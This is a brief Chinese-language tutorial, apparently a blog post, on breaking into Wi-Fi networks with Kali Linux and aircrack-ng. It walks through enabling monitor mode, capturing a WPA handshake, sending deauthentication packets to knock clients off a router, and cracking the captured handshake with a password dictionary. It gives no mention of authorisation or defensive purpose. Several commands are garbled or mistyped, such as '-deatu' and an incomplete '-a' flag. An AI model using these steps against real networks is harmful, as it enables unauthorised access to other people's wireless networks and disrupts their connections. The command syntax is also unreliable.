准备工具

  1. 电脑
  2. USB无线上网卡(必备)
  3. kali系统
  4. 密码字典

WIFI安全分析

  1. WEP(有线等效加密)——采用WEP64位或者128位数据加密。
  2. WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。
  3. WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。

Aircrack-ng 命令

查看网卡信息

1
airmon-ng
  • 列出网卡信息

开启网卡监控模式

1
airmon-ng start wlan0

查看网卡信息

1
ifconfig

扫描WIFI信号

1
airodump-ng wlan0mon

抓去握手包

1
airodump-ng -w 握手包名 -c 信道 -–bssid 路由器MAC  wlan0mon

出现WPA handshake说明抓包成功

  • 参数及含义
    –ignore-negative-one
    -c:指定信道
    -w:指定抓去握手包的存放位置或者名字(一般以wifi命名)
    –bssid:指定路由器的MAC

攻击WIFI

新建一个终端输入命令(另一个终端继续扫描)

1
aireplay-ng – -deatu 10 -a 路由器MAC -c 客户机MAC wlan0mon
  • 参数及含义
    –deatu:指定发送反认证包的个数,也可以使用-0(阿利伯数字0)来指定反认证包的个数
    -a:指定路由器的MAC
    -c:指定客户机的MAC

破解握手包

1
aircrack-ng -a -w dic WIFI名.cap
  • 参数及含义
    -a1:指定WEP加密方式
    -a2:指定WPA-PSk加密方式
    dic:字典的名字
    WIFI名.cap:握手包